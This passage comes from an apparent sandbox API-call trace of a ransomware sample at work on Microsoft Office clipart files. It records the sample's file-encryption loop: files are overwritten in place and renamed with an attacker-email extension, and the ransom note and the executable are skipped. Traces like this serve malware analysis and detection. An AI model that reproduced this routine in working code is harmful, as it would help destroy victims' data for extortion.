office\\root\\clipart\\pub60cor\\an04384_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.417] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1384, lpOverlapped=0x0) returned 1 [0108.445] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.445] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.445] _errno () returned 0x84b1160840 [0108.445] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.446] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x13a0, lpOverlapped=0x0) returned 1 [0108.446] CloseHandle (hObject=0x1a8) returned 1 [0108.446] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.446] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.446] __uncaught_exception () returned 0x84b1160800 [0108.446] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.446] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf.[evil@cock.lu].evil")) returned 1 [0108.447] ??_V@YAXPEAX@Z () returned 0x1 [0108.450] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF", dwFileAttributes=0x200) returned 0 [0108.450] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.450] wcsstr (_Str="AN04385_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.450] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 69 [0108.450] wcscmp (_String1="AN04385_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.450] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04385_.WMF") returned 0x0 [0108.450] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 0x45 [0108.450] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.452] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x138c, lpOverlapped=0x0) returned 1 [0108.454] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.454] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.454] _errno () returned 0x84b1160840 [0108.454] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.455] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x13a0, lpOverlapped=0x0) returned 1 [0108.455] CloseHandle (hObject=0x1a8) returned 1 [0108.455] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.455] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.455] __uncaught_exception () returned 0x84b1160800 [0108.455] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.455] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf.[evil@cock.lu].evil")) returned 1 [0108.456] ??_V@YAXPEAX@Z () returned 0x1 [0108.459] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF", dwFileAttributes=0x200) returned 0 [0108.459] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.459] wcsstr (_Str="BABY_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.459] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 68 [0108.459] wcscmp (_String1="BABY_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.459] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BABY_01.MID") returned 0x0 [0108.459] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 0x44 [0108.459] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\baby_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.462] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1cd8, lpOverlapped=0x0) returned 1 [0108.465] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.465] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.465] _errno () returned 0x84b1160840 [0108.465] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.465] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x1ce0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ce0, lpOverlapped=0x0) returned 1 [0108.465] CloseHandle (hObject=0x1a8) returned 1 [0108.465] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.465] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.465] __uncaught_exception () returned 0x84b1160800 [0108.465] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.465] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\baby_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\baby_01.mid.[evil@cock.lu].evil")) returned 1 [0108.466] ??_V@YAXPEAX@Z () returned 0x1 [0108.470] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID", dwFileAttributes=0x200) returned 0 [0108.470] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.470] wcsstr (_Str="BD00116_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.470] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 69 [0108.470] wcscmp (_String1="BD00116_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.470] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD00116_.WMF") returned 0x0 [0108.470] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 0x45 [0108.470] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.472] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1306, lpOverlapped=0x0) returned 1 [0108.475] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.475] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.475] _errno () returned 0x84b1160840 [0108.475] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.475] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1320, lpOverlapped=0x0) returned 1 [0108.475] CloseHandle (hObject=0x1a8) returned 1 [0108.475] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.476] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.476] __uncaught_exception () returned 0x84b1160800 [0108.476] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.476] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf.[evil@cock.lu].evil")) returned 1 [0108.477] ??_V@YAXPEAX@Z () returned 0x1 [0108.480] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF", dwFileAttributes=0x200) returned 0 [0108.480] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.480] wcsstr (_Str="BD00141_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.480] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 69 [0108.480] wcscmp (_String1="BD00141_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.480] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD00141_.WMF") returned 0x0 [0108.480] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 0x45 [0108.480] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.483] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6906, lpOverlapped=0x0) returned 1 [0108.486] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.486] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.486] _errno () returned 0x84b1160840 [0108.486] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.486] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x6920, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6920, lpOverlapped=0x0) returned 1 [0108.486] CloseHandle (hObject=0x1a8) returned 1 [0108.486] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.487] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.487] __uncaught_exception () returned 0x84b1160800 [0108.487] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.487] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf.[evil@cock.lu].evil")) returned 1 [0108.487] ??_V@YAXPEAX@Z () returned 0x1 [0108.490] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF", dwFileAttributes=0x200) returned 0 [0108.490] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.490] wcsstr (_Str="BD00146_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.491] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 69 [0108.491] wcscmp (_String1="BD00146_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.491] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD00146_.WMF") returned 0x0 [0108.491] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 0x45 [0108.491] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.493] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7114, lpOverlapped=0x0) returned 1 [0108.501] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.501] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.501] _errno () returned 0x84b1160840 [0108.502] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.502] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x7120, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7120, lpOverlapped=0x0) returned 1 [0108.502] CloseHandle (hObject=0x1a8) returned 1 [0108.502] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.502] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.502] __uncaught_exception () returned 0x84b1160800 [0108.502] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.503] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf.[evil@cock.lu].evil")) returned 1 [0108.503] ??_V@YAXPEAX@Z () returned 0x1 [0108.507] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF", dwFileAttributes=0x200) returned 0 [0108.507] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.507] wcsstr (_Str="BD00155_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.507] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 69 [0108.507] wcscmp (_String1="BD00155_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.507] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD00155_.WMF") returned 0x0 [0108.507] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 0x45 [0108.507] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.509] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2d74, lpOverlapped=0x0) returned 1 [0108.512] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.512] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.512] _errno () returned 0x84b1160840 [0108.512] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.512] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2d80, lpOverlapped=0x0) returned 1 [0108.513] CloseHandle (hObject=0x1a8) returned 1 [0108.514] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.514] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.514] __uncaught_exception () returned 0x84b1160800 [0108.514] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.514] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf.[evil@cock.lu].evil")) returned 1 [0108.515] ??_V@YAXPEAX@Z () returned 0x1 [0108.518] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF", dwFileAttributes=0x200) returned 0 [0108.518] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.518] wcsstr (_Str="BD00160_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.518] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 69 [0108.518] wcscmp (_String1="BD00160_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.518] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD00160_.WMF") returned 0x0 [0108.518] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 0x45 [0108.519] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.520] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x57f4, lpOverlapped=0x0) returned 1 [0108.523] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.523] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.524] _errno () returned 0x84b1160840 [0108.524] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.524] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5800, lpOverlapped=0x0) returned 1 [0108.524] CloseHandle (hObject=0x1a8) returned 1 [0108.524] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.524] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.524] __uncaught_exception () returned 0x84b1160800 [0108.524] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.525] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf.[evil@cock.lu].evil")) returned 1 [0108.525] ??_V@YAXPEAX@Z () returned 0x1 [0108.529] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF", dwFileAttributes=0x200) returned 0 [0108.529] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.529] wcsstr (_Str="BD00173_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.529] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 69 [0108.529] wcscmp (_String1="BD00173_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.529] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD00173_.WMF") returned 0x0 [0108.529] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 0x45 [0108.529] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.531] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, 